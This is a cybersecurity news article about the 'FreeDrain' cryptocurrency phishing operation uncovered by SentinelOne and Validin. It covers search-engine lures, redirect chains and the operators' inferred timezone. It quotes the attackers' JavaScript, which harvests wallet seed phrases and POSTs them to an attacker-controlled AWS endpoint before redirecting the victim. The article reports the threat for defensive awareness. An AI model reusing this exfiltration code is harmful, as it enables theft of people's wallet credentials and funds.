A sprawling phishing operation dubbed “FreeDrain” has emerged as an industrial-scale cryptocurrency theft network that systematically targets and drains digital wallets. This sophisticated campaign leverages search engine manipulation and free-tier web hosting services to create an extensive web of malicious sites that appear legitimate to unsuspecting users searching for cryptocurrency wallet information.
The attack begins when users search for wallet-related queries such as “Trezor wallet balance” or “Ledger Live” on major search engines. Victims click on high-ranking malicious results, often appearing on the first page of search results, and land on seemingly helpful pages. These initial lure pages—typically a single large image of a legitimate wallet interface—redirect users through a series of hops before eventually reaching a phishing page designed to steal wallet seed phrases.
SentinelOne researchers, in collaboration with Validin, recently unveiled the full scope of this operation at PIVOTcon 2025, identifying over 38,000 distinct FreeDrain subdomains hosting lure pages. Their investigation began after a distressed victim reported losing approximately 8 BTC (worth around $500,000) after entering their seed phrase on a fake Trezor wallet site.
“FreeDrain represents a modern blueprint for scalable phishing operations,” noted Tom Hegel, Principal Threat Researcher at SentinelOne. “What makes this campaign particularly effective is its ability to thrive on free-tier platforms, evade traditional abuse detection, and adapt rapidly to infrastructure takedowns.”
The technical sophistication of FreeDrain lies in its multi-layered approach. When a victim clicks a malicious search result hosted on platforms like gitbook.io or webflow.io, they encounter a page displaying a screenshot of a legitimate wallet interface. Clicking this image triggers a series of redirects through algorithmically generated domains like “shotheatsgnovel.com” or “bildherrywation.com” before landing on the final phishing page.
The actual credential theft occurs through unobfuscated JavaScript that sends the victim’s seed phrase to attacker-controlled endpoints. A sample of the exfiltration code reveals its straightforward yet effective approach:
- const data = {}; inputs.forEach((input, index) => { data['phrase${index}'] = input.value.trim(); }); data. Subject = "Trezor connect2"; data.message = "Successful fetch data"; $.ajax({ type: "POST", url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/pro", datatype: "json", crossDomain: true, contentType: "application/json; charset=utf-8", data: JSON.stringify(data), success: function (result) { window.location.href = 'https://suite.trezor.io/web/'; }, error: function (xhr, status, error) { window.location.href = 'https://suite.trezor.io/web/'; } });
This code sends the captured seed phrase to an AWS API Gateway endpoint before redirecting the victim to the legitimate wallet site, leaving them unaware their credentials have been compromised until their funds disappear.
Analysis of FreeDrain’s infrastructure revealed that the operation is likely run by individuals based in the UTC+05:30 timezone (Indian Standard Time), working standard business hours with clear weekday patterns and midday breaks—suggesting a structured, professional operation rather than opportunistic attacks.
FreeDrain’s operation has been stealthily siphoning digital assets for years, exploiting the trust associated with platforms like gitbook.io, webflow.io, and github.io. By orchestrating a sprawling network of over 38,000 subdomains hosting lure pages, the operation funnels victims into phishing sites designed to steal sensitive seed phrases.
These phishing pages, often hosted on robust cloud infrastructures like Amazon S3 and Azure Web Apps, mimic legitimate wallet interfaces with alarming precision, making it nearly impossible for users to discern the fraud until their funds are irreversibly drained. The operational workflow of FreeDrain is deceptively simple yet brutally effective.
Victims typically begin by searching for wallet-related queries on major search engines like Google, Bing, or DuckDuckGo, where malicious results, boosted through SEO tactics like spamdexing and AI-generated content, appear prominently. Upon clicking these results, users land on lure pages featuring static screenshots of legitimate wallet interfaces, often hosted on trusted free platforms. These pages redirect victims through a chain of intermediary domains—sometimes up to five hops—before arriving at a phishing site that prompts the entry of seed phrases.
The stolen data is then transmitted via unobfuscated JavaScript POST requests to attacker-controlled endpoints, with funds siphoned off and laundered through cryptocurrency mixers within minutes. Intriguingly, metadata from GitHub repositories and Webflow publish timestamps strongly indicate that FreeDrain operators are based in the UTC+05:30 timezone (likely India), adhering to a standard 9-to-5 weekday schedule.
Despite documented activity since 2022 and an acceleration in 2024, systemic weaknesses in abuse detection and reporting mechanisms across free-tier platforms have allowed FreeDrain to persist. According to the SentinelOne report, this operation underscores a critical need for enhanced platform-level defenses, proactive monitoring, and user education to combat such financially motivated cyber threats.
The abuse of legitimate services not only facilitates fraud but also erodes trust, posing reputational and operational risks to these platforms. As the digital landscape continues to evolve, the threat posed by operations like FreeDrain highlights the importance of vigilance and education in safeguarding personal and financial information.
In summary, FreeDrain represents a significant challenge in the realm of cybersecurity, particularly for cryptocurrency users. As phishing techniques grow increasingly sophisticated, the need for robust defenses and informed users becomes paramount. With over 38,000 subdomains identified and a professional operation behind the scenes, the implications of this campaign are profound, calling for immediate action from both users and service providers alike.
